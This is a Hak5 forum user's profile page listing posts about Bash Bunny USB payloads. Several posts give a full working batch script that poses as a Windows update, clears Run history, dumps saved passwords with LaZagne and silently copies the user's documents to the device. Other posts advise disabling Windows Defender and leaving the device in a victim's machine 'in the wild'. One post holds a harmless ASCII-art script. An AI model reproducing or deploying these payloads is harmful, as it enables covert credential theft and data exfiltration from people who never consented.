Jump to content

D31M0Z

Active Members
  • Content Count

    19
  • Joined

  • Last visited

About D31M0Z

  • Rank
    Hak5 Fan

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Lol impossiblerrr! :) i lolol'd so hard
  2. I don't see how user error can be at fault here so don't worry on that front. The payload/duck script run flawless on mine. Try factory resetting your bunny and retrying.
  3. they are .cmd files not .exe lol
  4. #make a payload.txt containing this LED SETUP ATTACKMODE HID STORAGE GET SWITCH_POSITION LED ATTACK if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then QUACK ${SWITCH_POSITION}/ducky_script.txt LED FINISH else LED FAIL echo "Unable to load ducky_script.txt" >> /root/debuglog.txt exit 1 fi #then make a ducky_script.txt containing this DELAY 2000 GUI r DELAY 1000 STRING notepad.exe DELAY 300 STRING (\___/) ENTER DELAY 300 STRING (='.'=) ENTER DELAY 300 STRING (")_(") DELAY 300 #put them both in the same switch folder and try it out ;) #it's the long way to do it but I like it cause if it fails I get a debug log :)
  5. the only time it doesn't work for me is if i don't let it do its thing long enough. i got to go to work but you can clone my whole switch folder from git hub Here's the link ^ if you get errors from that its probably from premature BB pulling or you have no files with the extension your xcopying
  6. word, try to replace your whole e.cmd with mine that i attached below, there might be errors somewhere else in your e.cmd. e.cmd
  7. whats your xcopy line look like? Example1: (*=wildcard so it searches through all) if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.pdf %dst% >>nul) Example2:(does Documents folder) if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul) Example3:(does Desktop folder) if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.pdf %dst% >>nul) **all the examples do pdf files**change the .pdf to what file type you want to grab** Another question is, do you have any files labeled with the extension your trying to grab?
  8. Above is a direct copy of my e.cmd, e.cmd is the only file i ever edit on this payload. **try running it and before pulling the bash bunny try to 'eject' it from windows, if windows gives you an error message saying its busy then xcopy is still running so you need to wait** **BB is fast but you still need to give it time for some payloads, especially exfiltration payloads** **just think about how long it takes you to move pictures or docs into a normal flash drive, the BB does have a great transfer rate though lol**
  9. @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious REM This executes LaZagne in the current directory and outputs the password file to Loot REM Time and Date is also added setlocal cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit
  10. the powershell opening then closing is the first line, everythiing else needs to load so dont prematurely pull the bunny. wait for that caps lock to blink for the okay from the bunny itself. the loot folder should contain a directory labeled with the victim then a txt file containing the lazange scan for example if i were to deploy this in the wild i would make sure it can be inserted and left for at least 5-10 min. to make sure the xcopy command finishes and exits so i don't miss anything. doesnt need to be 5-10 min. (only needs to hit the last line where it flashes caps lock) but it gives me a time frame to wait on then come back to it and pull.
  11. the only line i change when comeing frrom a fresh payload copy is: the *'s are wildcards so the xcopy will search any directories or names in the user profile containing txt files. the /C /Q /G /Y are explained below the xcopy command /S makes sure it doesnt grab empty folders if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.doc %dst% >>nul REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul )
  12. #the link you provided doesnt work since its a local file not an internet file lol but here is my e.cmd for txt files @echo off @echo Installing Windows Update REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f setlocal #Below uses the laZange.exe in your switch folder cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" #Below runs xcopy to grab file specified by location and file extension (the one below grabs simple .txt documents #Try making a txt document on your desktop labeled target.txt then run the payload to see if it grabs it. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul) #the line below spams caps lock to tell you that the payload is done and files are coppied (if you have a caps lock led on your keyboard it should blink when the payload finishes.) start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit
  13. Configure the xcopy command in e.cmd to whatever your trying to grab, I also found if I have set up internet share with the bunny it won’t dump files but it still grabs passwords with lazange. If you have sharing turned on in your main network card turn it off when testing the payload. ? lazange.exe/I.vbs/e.cmd/d.cmd/payload.txt should all be in the same switch (1/2) folded so they can be used together. *Also use notepad++ not notepad cause it works better ?
  14. Could be windows defender blocking LaZange from working, was the only thing I found that would give me an empty password.txt if it was active during scan. It also auto deletes hack tools or quarantines them automatically when active so I always shut it off before arming my bunny.
  15. The *'s are 'wildcards' you can replace them with desired target names or change the file extension (.doc) to any desired.
×
×
  • Create New...